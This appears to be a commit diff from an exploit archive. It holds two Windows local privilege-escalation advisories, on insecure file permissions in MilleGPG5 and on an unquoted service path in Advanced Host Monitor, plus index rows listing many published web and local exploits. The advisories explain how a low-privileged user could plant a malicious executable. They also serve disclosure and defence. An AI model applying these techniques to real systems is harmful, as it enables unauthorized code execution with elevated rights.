# Date: 2023-04-28
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://millegpg.it/
# Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/
# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
# Version: 5.9.2
# Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913
# CVE: CVE-2023-25438
MilleGPG / MilleGPG5 also known as "Governo Clinico 3"
Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.
Affected/tested version: MilleGPG5 5.9.2
Summary:
Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through the
Italian general practice network.
MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes,
complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for the
General Practitioner, also offering contextual access to the most authoritative scientific content and CME training.
Vuln desc:
The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing some
files to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weakness
abusing the "write" permission of the main application available to all users on the system or network.
Details:
Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.:
C:\Program Files\MilleGPG5\MilleGPG5.exe (main gui application)
C:\Program Files\MilleGPG5\plugin\ (GPGCommand.exe, nginx and php files)
C:\Program Files\MilleGPG5\k-platform\ (api and webapp files)
such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA

59
exploits/windows/local/51412.txt Normal file
View file

@ -0,0 +1,59 @@
# Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path
# Date: 2023-04-23
# CVE: CVE-2023-2417
# Exploit Author: MrEmpy
# Vendor Homepage: https://www.ks-soft.net
# Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm
# Version: > 12.56
# Tested on: Windows 10 21H2
Title:
================
Advanced Host Monitor > 12.56 - Unquoted Service Path
Summary:
================
An unquoted service path vulnerability has been discovered in Advanced Host
Monitor version > 12.56 affecting the executable "C:\Program Files
(x86)\HostMonitor\RMA-Win\rma_active.exe" . This vulnerability occurs when
the service's path is misconfigured, allowing an attacker to run a
malicious file instead of the legitimate executable associated with the
service.
An attacker with local user privileges could exploit this vulnerability to
replace the legitimate RMA-Win\rma_active.exe service executable with a
malicious file of the same name and located in a directory that has a
higher priority than the legitimate directory. That way, when the service
starts, it will run the malicious file instead of the legitimate
executable, allowing the attacker to execute arbitrary code, gain
unauthorized access to the compromised system, or stop the service from
functioning.
To exploit this vulnerability, an attacker would need local access to the
system and the ability to write and replace files on the system. The
vulnerability can be mitigated by correcting the service path to correctly
quote the full path of the executable, including quotation marks.
Furthermore, it is recommended that users keep software updated with the
latest security updates and limit physical and network access to their
systems to prevent malicious attacks.
Proof of Concept:
================
C:\>sc qc ActiveRMAService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ActiveRMAService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files
(x86)\HostMonitor\RMA-Win\rma_active.exe /service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : KS Active Remote Monitoring Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

18
files_exploits.csv
View file

@ -3250,6 +3250,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50773,exploits/hardware/local/50773.sh,"Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation",2022-02-21,ibby,local,hardware,,2022-02-21,2022-02-21,0,,,,,,
24899,exploits/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Local Privilege Escalation",2013-03-29,"Mohammad abou hayt",local,hardware,,2013-03-29,2013-03-29,0,OSVDB-91811,,,,,
50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",2021-09-13,Neurogenesia,local,hardware,,2021-09-13,2021-09-13,0,,,,,,
51414,exploits/hardware/local/51414.py,"FS-S3900-24T4S - Privilege Escalation",2023-05-02,"Daniele Linguaglossa",local,hardware,,2023-05-02,2023-05-02,0,CVE-2023-30350,,,,,
44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware,,2018-03-19,2018-03-19,0,CVE-2015-8088,,,,,https://github.com/hardenedlinux/offensive_poc/blob/0cfe3764a0388e3715b018d1d59ef801f8b16b73/CVE-2015-8088/cve-2015-8088-poc.c
47763,exploits/hardware/local/47763.txt,"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials",2019-12-10,LiquidWorm,local,hardware,,2019-12-10,2019-12-10,0,,,,,,
45785,exploits/hardware/local/45785.md,"Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel",2018-11-02,"Billy Brumley",local,hardware,,2018-11-05,2018-11-05,0,CVE-2018-5407,,,,,https://github.com/bbbrumley/portsmash/tree/e3e7447ba04e1a8a5637cabadf3403faf94f7a56
@ -12168,7 +12169,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,,2021-07-01,2021-07-01,0,,,,,,
11409,exploits/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection",2010-02-11,JaMbA,webapps,multiple,80,2010-02-10,2010-11-12,1,OSVDB-62295;CVE-2010-0690,,,,,
38706,exploits/multiple/webapps/38706.txt,"VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",webapps,multiple,,2015-11-16,2015-11-16,0,OSVDB-130352,,,,,
51142,exploits/multiple/webapps/51142.txt,"Virtual Reception v1.0 - Web Server Directory Traversal",2023-03-30,Spinae,webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
51142,exploits/multiple/webapps/51142.txt,"Virtual Reception v1.0 - Web Server Directory Traversal",2023-03-30,Spinae,webapps,multiple,,2023-03-30,2023-05-02,0,CVE-2023-25289,,,,,
50098,exploits/multiple/webapps/50098.txt,"Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)",2021-07-06,"Andrea D\'Ubaldo",webapps,multiple,,2021-07-06,2021-10-15,0,CVE-2021-42071,,,,,
48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple,,2020-06-01,2020-06-01,0,CVE-2020-3952,,,,,
50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple,,2021-06-24,2021-10-28,0,CVE-2021-21972,,,,,
@ -13413,6 +13414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21005,exploits/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",webapps,php,,2012-09-02,2016-11-28,1,CVE-2012-4749;CVE-2012-4748;OSVDB-85146;OSVDB-85145,,,,http://www.exploit-db.comadmidio-2.3.5.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txt
42005,exploits/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",webapps,php,,2017-05-15,2017-05-15,1,CVE-2017-8382,,,,http://www.exploit-db.comadmidio-3.2.8.zip,
45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80,2018-09-03,2018-09-03,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadmidio-3.3.5.zip,
51402,exploits/php/webapps/51402.txt,"admidio v4.2.5 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
36290,exploits/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,webapps,php,,2011-11-07,2015-03-06,1,,,,,,https://www.securityfocus.com/bid/50562/info
9161,exploits/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,webapps,php,,2009-07-14,,1,OSVDB-56235;CVE-2009-2558,,,,,
9153,exploits/php/webapps/9153.txt,"Admin News Tools 2.5 - 'fichier' Remote File Disclosure",2009-07-15,Securitylab.ir,webapps,php,,2009-07-14,,1,OSVDB-55856;CVE-2009-2557,,,,,
@ -15999,6 +16001,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50425,exploits/php/webapps/50425.txt,"Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)",2021-10-18,"Aniket Deshmane",webapps,php,,2021-10-18,2021-10-18,0,,,,,,
50404,exploits/php/webapps/50404.txt,"Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)",2021-10-13,"Yash Mahajan",webapps,php,,2021-10-13,2021-10-13,0,,,,,,
50421,exploits/php/webapps/50421.txt,"Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)",2021-10-18,"Aniket Deshmane",webapps,php,,2021-10-18,2021-10-18,0,,,,,,
51417,exploits/php/webapps/51417.txt,"Companymaps v8.0 - Stored Cross Site Scripting (XSS)",2023-05-02,"Lucas Noki (0xPrototype)",webapps,php,,2023-05-02,2023-05-02,0,CVE-2023-29983,,,,,
32875,exploits/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,webapps,php,,2009-03-25,2014-04-15,1,,,,,,https://www.securityfocus.com/bid/34232/info
5834,exploits/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,webapps,php,,2008-06-16,,1,OSVDB-46289;CVE-2008-2791,,,,,
42968,exploits/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,webapps,php,,2017-10-10,2017-10-10,0,,,,,,
@ -19039,6 +19042,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51229,exploits/php/webapps/51229.txt,"GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34127,,,,,
49992,exploits/php/webapps/49992.py,"GLPI 9.4.5 - Remote Code Execution (RCE)",2021-06-14,"Brian Peters",webapps,php,,2021-06-14,2021-06-14,0,CVE-2020-11060,,,,,
49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,,2021-03-08,2021-03-08,0,,,,,,
51418,exploits/php/webapps/51418.py,"GLPI 9.5.7 - Username Enumeration",2023-05-02,"Rafael B.",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,,
51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,,
51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,,
@ -24929,6 +24933,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49784,exploits/php/webapps/49784.py,"OpenEMR 5.0.2.1 - Remote Code Execution",2021-04-21,Hato0,webapps,php,,2021-04-21,2021-04-21,0,,,,,,
50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",2021-09-06,"Allen Enosh Upputori",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-40352,,,,,
14011,exploits/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",webapps,php,,2010-06-24,2010-06-24,1,OSVDB-65745,,,,,
51413,exploits/php/webapps/51413.py,"OpenEMR v7.0.1 - Authentication credentials brute force",2023-05-02,"abhhi (Abhishek Birdawade)",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
17998,exploits/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",webapps,php,,2011-10-19,2011-12-01,1,OSVDB-70134,,,,,
27823,exploits/php/webapps/27823.txt,"openEngine 1.7/1.8 - Template Unauthorized Access",2006-05-08,ck@caroli.info,webapps,php,,2006-05-08,2016-12-23,1,CVE-2006-2280;OSVDB-25359,,,,http://www.exploit-db.comopenengine17.zip,https://www.securityfocus.com/bid/17871/info
17951,exploits/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection Vulnerabilities",2011-10-10,"Stefan Schurtz",webapps,php,,2011-10-10,2011-12-04,0,OSVDB-76155,,,,http://www.exploit-db.comopenengine20_beta4.zip,http://www.rul3z.de/advisories/SSCHADV2011-019.txt
@ -25973,6 +25978,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32241,exploits/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,webapps,php,,2008-08-13,2014-03-14,1,CVE-2008-3682;OSVDB-47382,,,,,https://www.securityfocus.com/bid/30678/info
8658,exploits/php/webapps/8658.txt,"PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Injection",2009-05-11,scriptjunkie,webapps,php,,2009-05-10,,1,OSVDB-54720;CVE-2009-1781;OSVDB-54719;CVE-2009-1780;OSVDB-54718;CVE-2009-1779,,,,,
50699,exploits/php/webapps/50699.txt,"PHP Restaurants 1.0 - SQLi (Unauthenticated)",2022-02-02,"Nefrit ID",webapps,php,,2022-02-02,2022-02-02,0,,,,,,
51398,exploits/php/webapps/51398.txt,"PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting",2023-05-02,Or4nG.M4N,webapps,php,,2023-05-02,2023-05-02,0,,,,,,
36551,exploits/php/webapps/36551.txt,"PHP Ringtone Website - 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,webapps,php,,2012-01-15,2015-03-30,1,,,,,,https://www.securityfocus.com/bid/51418/info
29258,exploits/php/webapps/29258.txt,"PHP RSS Reader 2010 - SQL Injection",2013-10-28,"mishal abdullah",webapps,php,,2013-10-31,2013-10-31,1,OSVDB-99594,,,,,
31022,exploits/php/webapps/31022.txt,"PHP Running Management 1.0.2 - 'index.php' Cross-Site Scripting",2008-01-13,"Christophe VG",webapps,php,,2008-01-13,2014-01-17,1,CVE-2008-0258;OSVDB-40261,,,,,https://www.securityfocus.com/bid/27268/info
@ -26761,6 +26767,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2313,exploits/php/webapps/2313.txt,"phpFullAnnu 5.1 - 'repmod' Remote File Inclusion",2006-09-06,SHiKaA,webapps,php,,2006-09-05,2016-09-09,1,OSVDB-28574;CVE-2006-4644,,,,http://www.exploit-db.comphpfullannu-v5.1.zip,
48497,exploits/php/webapps/48497.txt,"PHPFusion 9.03.50 - Persistent Cross-Site Scripting",2020-05-21,coiffeur,webapps,php,,2020-05-21,2020-05-21,0,,,,,,
49911,exploits/php/webapps/49911.py,"PHPFusion 9.03.50 - Remote Code Execution",2021-05-28,g0ldm45k,webapps,php,,2021-05-28,2021-06-28,1,CVE-2020-24949,,,,"http://www.exploit-db.comPHP-Fusion 9.03.50.zip",
51411,exploits/php/webapps/51411.txt,"PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
7540,exploits/php/webapps/7540.txt,"phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service",2008-12-21,"Anarchy Angel",webapps,php,,2008-12-20,,1,,,,,,
15573,exploits/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,webapps,php,,2010-11-19,2015-07-12,0,,,,,,
3699,exploits/php/webapps/3699.txt,"PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion",2007-04-10,anonymous,webapps,php,,2007-04-09,,1,OSVDB-34811;CVE-2007-2019,,,,,
@ -26860,6 +26867,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32441,exploits/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,webapps,php,,2008-09-29,2014-03-23,1,,,,,,https://www.securityfocus.com/bid/31467/info
30952,exploits/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Cross-Site Request Forgery (Add Admin)",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102221,,,,,
50475,exploits/php/webapps/50475.txt,"PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,php,,2021-11-03,2021-11-03,0,,,,,,
51416,exploits/php/webapps/51416.txt,"PHPJabbers Simple CMS 5.0 - SQL Injection",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
51415,exploits/php/webapps/51415.txt,"PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
30953,exploits/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102178;OSVDB-102177;OSVDB-102176,,,,,
30955,exploits/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102225;OSVDB-102224;OSVDB-102220,,,,,
2775,exploits/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,webapps,php,,2006-11-12,,1,OSVDB-30367;CVE-2006-5928;OSVDB-30366;OSVDB-30365;OSVDB-30364,,,,,
@ -27079,6 +27088,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42987,exploits/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting (2)",2017-10-13,"Ishaq Mohammed",webapps,php,,2017-10-13,2017-11-17,0,CVE-2017-14619,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
43063,exploits/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15727,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
33385,exploits/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",webapps,php,,2009-12-01,2016-09-27,1,CVE-2009-4780;OSVDB-60586,,,,http://www.exploit-db.comphpmyfaq-2.5.3.zip,https://www.securityfocus.com/bid/37180/info
51399,exploits/php/webapps/51399.txt,"phpMyFAQ v3.1.12 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
27586,exploits/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php?type' CRLF Injection",2006-04-10,Psych0,webapps,php,,2006-04-10,2013-08-14,1,CVE-2006-1714;OSVDB-24705,,,,,https://www.securityfocus.com/bid/17420/info
27585,exploits/php/webapps/27585.txt,"PHPMyForum 4.0 - 'page' Cross-Site Scripting",2006-04-10,Psych0,webapps,php,,2006-04-10,2016-12-30,1,CVE-2006-1713;OSVDB-24704,,,,,https://www.securityfocus.com/bid/17420/info
7392,exploits/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - Local/Remote File Inclusion",2008-12-09,ZoRLu,webapps,php,,2008-12-08,2016-10-27,1,OSVDB-52751;CVE-2008-6317;OSVDB-18331;CVE-2008-6316;CVE-2008-6315,,,,,
@ -28035,6 +28045,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info
35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip,
50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
51400,exploits/php/webapps/51400.txt,"projectSend r1605 - Private file download",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip,
36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip,
@ -28566,6 +28577,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43821,exploits/php/webapps/43821.txt,"ReviewPost < 2.84 - Multiple Vulnerabilities",2015-01-02,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00060;CVE-2005-0270;CVE-2005-0271;CVE-2005-0272,,,,,http://gulftech.org/advisories/ReviewPost%20Multiple%20Vulnerabilities/60
41939,exploits/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",webapps,php,,2017-04-26,2017-04-26,0,,,,,http://www.exploit-db.comrevive-adserver-4.0.1.zip,
47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,,2019-12-03,2019-12-03,0,CVE-2019-5434,,,,http://www.exploit-db.comrevive-adserver-4.2.0.tar.gz,
51401,exploits/php/webapps/51401.txt,"revive-adserver v5.4.1 - Cross-Site Scripting (XSS)",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
5677,exploits/php/webapps/5677.py,"RevokeBB 1.0 RC11 - 'Search' SQL Injection",2008-05-27,The:Paradox,webapps,php,,2008-05-26,2016-12-02,1,OSVDB-46454;CVE-2008-2778,,,,http://www.exploit-db.comRevokeBB_RC11_webinstall.zip,
4020,exploits/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve",2007-06-01,BlackHawk,webapps,php,,2007-05-31,2016-10-05,1,OSVDB-38366;CVE-2007-3051,,,,http://www.exploit-db.comRevokeBB_1_0_RC3.zip,
12726,exploits/php/webapps/12726.txt,"REvolution 10.02 - Cross-Site Request Forgery",2010-05-24,"High-Tech Bridge SA",webapps,php,,2010-05-23,,0,OSVDB-64679,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_npds_revolution.html
@ -29062,6 +29074,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5960,exploits/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,webapps,php,,2008-06-26,2016-12-09,1,OSVDB-46567;CVE-2008-5191;OSVDB-46566,,,,,
18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php,,2011-12-09,2016-12-14,0,OSVDB-77591,,,,http://www.exploit-db.comseportal2.5.zip,
51373,exploits/php/webapps/51373.txt,"Serendipity 2.4.0 - Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
51403,exploits/php/webapps/51403.txt,"Serendipity 2.4.0 - File Inclusion RCE",2023-05-02,nu11secur1ty,webapps,php,,2023-05-02,2023-05-02,0,,,,,,
51372,exploits/php/webapps/51372.txt,"Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,,
45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip,
@ -29764,6 +29777,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28780,exploits/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - 'Grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php,,2006-10-10,2013-10-07,1,,,,,,https://www.securityfocus.com/bid/20442/info
2520,exploits/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - Remote File Inclusion",2006-10-12,MP,webapps,php,,2006-10-11,2017-10-07,1,OSVDB-29623;CVE-2006-5472;OSVDB-29622;OSVDB-29621,,,,http://www.exploit-db.comPHPLibrary-1.5.3.zip,http://pastebin.com/r7LCdeTC
3600,exploits/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - 'inc_dir' Remote File Inclusion",2007-03-29,K-159,webapps,php,,2007-03-28,,1,OSVDB-34626;CVE-2007-1787,,,,,http://advisories.echo.or.id/adv/adv80-K-159-2007.txt
51404,exploits/php/webapps/51404.sh,"SoftExpert (SE) Suite v2.1.3 - Local File Inclusion",2023-05-02,"Felipe Alcantara",webapps,php,,2023-05-02,2023-05-02,0,CVE-2023-30330,,,,,
44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80,2018-07-05,2018-07-05,0,,"SQL Injection (SQLi)",,,,
39189,exploits/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-07,1,OSVDB-107114,,,,,https://www.securityfocus.com/bid/67465/info
17209,exploits/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,webapps,php,,2011-04-24,2011-04-24,0,,,,,,
@ -39069,6 +39083,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40995,exploits/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,local,windows,,2017-01-08,2017-01-08,1,,,,,http://www.exploit-db.comADL-Trial-Setup.zip,
46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,,2019-03-19,2019-03-19,0,,Local,,,http://www.exploit-db.comhm1192.exe,
46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,,2019-03-19,2019-03-19,0,,"Buffer Overflow",,,http://www.exploit-db.comhm1192.exe,
51412,exploits/windows/local/51412.txt,"Advanced Host Monitor v12.56 - Unquoted Service Path",2023-05-02,"Mr Empy",local,windows,,2023-05-02,2023-05-02,0,,,,,,
49049,exploits/windows/local/49049.txt,"Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path",2020-11-16,"Jair Amezcua",local,windows,,2020-11-16,2020-11-16,0,,,,,,
47905,exploits/windows/local/47905.txt,"Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions",2020-01-13,ZwX,local,windows,,2020-01-13,2020-04-13,1,,,,,,
35503,exploits/windows/local/35503.rb,"Advantech AdamView 4.30.003 - '.gni' Local Buffer Overflow (SEH)",2014-12-09,"Muhamad Fadzil Ramli",local,windows,,2014-12-10,2014-12-10,0,CVE-2014-8386;OSVDB-114843,,,,,
@ -40611,6 +40626,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47510,exploits/windows/local/47510.txt,"Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path",2019-10-16,cakes,local,windows,,2019-10-16,2019-10-16,0,,,,,http://www.exploit-db.commikogo-starter.exe,
43033,exploits/windows/local/43033.py,"Mikogo 5.4.1.160608 - Local Credentials Disclosure",2017-10-23,LiquidWorm,local,windows,,2017-10-24,2017-10-24,0,,,,,,
